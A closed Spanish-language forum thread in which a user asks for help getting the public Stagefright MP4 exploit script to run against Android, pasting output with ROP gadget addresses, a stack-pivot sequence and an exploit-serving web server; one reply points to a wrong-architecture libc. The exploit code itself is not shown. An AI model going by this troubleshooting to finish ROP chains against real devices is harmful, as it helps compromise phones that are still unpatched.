Android Stagefright Google Zero Day Exploit no se ejecuta. ¿Como arreglar? [cerrado]

4

La publicación se publica aquí , sin embargo, faltan varias cosas. , por ejemplo, shellcode y se vincula a localhost para su explotación, no puedo acceder a él desde un dispositivo Android cuando se inicia en mi computadora. He modificado los dos en mi versión.

Para ejecutar el exploit, copié el archivo libc.so de Android al directorio de trabajo. Sin embargo, no se pueden encontrar pop_r0_r1_r2_r3_pc y pop_r4_r5_r6_r7_pc. Los codifiqué a 0xffffffff solo para ver si sigue funcionando. ¿Cómo obtener correctamente esos valores? ¿Qué libc.so debo usar?

Ejecución de ejemplo:

./mp4_stagefright_release.py

[*] memcpy : 0xb6ecdc08
[*] mmap64 : 0xb6ed42ed
b6ecd034:       e280204c        add     r2, r0, #76     ; 0x4c
b6ecd038:       e8927ff0        ldm     r2, {r4, r5, r6, r7, r8, r9, sl, fp, ip, sp, lr}
b6ecd03c:       e33d0000        teq     sp, #0
b6ecd040:       133e0000        teqne   lr, #0
3068973108
[*] stack_pivot : 0xb6ecd034
b6f0f784:       e49df004        pop     {pc}            ; (ldr pc, [sp], #4)
[*] pop_pc : 0xb6f0f784
[*] pop_r0_r1_r2_r3_pc : 0xffffffff
[*] pop_r4_r5_r6_r7_pc : 0xffffffff
b6f1015c:       e59de040        ldr     lr, [sp, #64]   ; 0x40
b6f10160:       e28dd048        add     sp, sp, #72     ; 0x48
b6f10164:       e12fff1e        bx      lr
[17/Sep/2015:22:21:01] ENGINE Listening for SIGHUP.
[17/Sep/2015:22:21:01] ENGINE Listening for SIGTERM.
[17/Sep/2015:22:21:01] ENGINE Listening for SIGUSR1.
[17/Sep/2015:22:21:01] ENGINE Bus STARTING
CherryPy Checker:
The Application mounted at '' has an empty config.

[17/Sep/2015:22:21:01] ENGINE Started monitor thread 'Autoreloader'.
[17/Sep/2015:22:21:01] ENGINE Started monitor thread '_TimeoutMonitor'.
[17/Sep/2015:22:21:02] ENGINE Serving on http://0.0.0.0:8080
[17/Sep/2015:22:21:02] ENGINE Bus STARTED
    
pregunta android_dev 18.09.2015 - 11:21
fuente

1 respuesta

0

También estoy tratando con esta vulnerabilidad intentando hacer que funcione, lo descargo de la base de datos de explotación.

Creo que el libc.so es de tu arquitectura en lugar del de Android porque si ves en el código usa una arquitectura de 64 bits.

Entonces haga una búsqueda en su directorio para libc.so .

    
respondido por el jackdirac 20.09.2015 - 16:05
fuente

Lea otras preguntas en las etiquetas